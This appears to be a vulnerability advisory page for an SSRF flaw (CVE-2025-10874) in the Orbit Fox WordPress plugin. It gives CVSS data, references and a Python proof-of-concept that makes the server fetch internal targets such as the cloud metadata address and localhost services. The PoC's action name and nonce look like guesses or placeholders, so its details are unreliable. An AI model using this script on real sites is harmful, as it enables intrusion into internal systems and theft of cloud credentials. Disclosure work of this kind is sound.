CVE-2025-10874

Description

The Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts & More WordPress plugin before 3.0.2 does not limit URLs which may be used for the stock photo import feature, allowing the user to specify arbitrary URLs. This leads to a server-side request forgery as the user may force the server to access any URL of their choosing.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Orbit Fox WordPress Plugin < 3.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-10874 SSRF PoC
# Target: WordPress site with vulnerable Orbit Fox plugin < 3.0.2

def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF vulnerability in Orbit Fox plugin
    target_url: WordPress site URL
    internal_target: Internal IP/URL to target (e.g., http://127.0.0.1:8080)
    """
    
    # WordPress admin endpoint with Orbit Fox stock photo import
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    # Construct SSRF payload
    payload = {
        'action': 'orbitfox_stock_photo_import',
        'image_url': internal_target,  # SSRF payload
        'nonce': 'attacker_controlled_or_leaked_nonce'
    }
    
    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        print(f"[*] Request sent to: {internal_target}")
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Length: {len(response.content)} bytes")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

# Example usage:
# exploit_ssrf('http://victim.com', 'http://169.254.169.254/latest/meta-data/')
# exploit_ssrf('http://victim.com', 'http://127.0.0.1:3306')
# exploit_ssrf('http://victim.com', 'http://10.0.0.1:8080/admin')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10874
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10874
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10874/
[4] VulDB https://vuldb.com/cve/CVE-2025-10874
[5] https://wpscan.com/vulnerability/171ba43f-55b6-471d-af0a-be553baf639a/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10874", "sourceIdentifier": "[email protected]", "published": "2025-10-24T06:15:35.307", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts & More WordPress plugin before 3.0.2 does not limit URLs which may be used for the stock photo import feature, allowing the user to specify arbitrary URLs. This leads to a server-side request forgery as the user may force the server to access any URL of their choosing."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://wpscan.com/vulnerability/171ba43f-55b6-471d-af0a-be553baf639a/", "source": "[email protected]"}]}}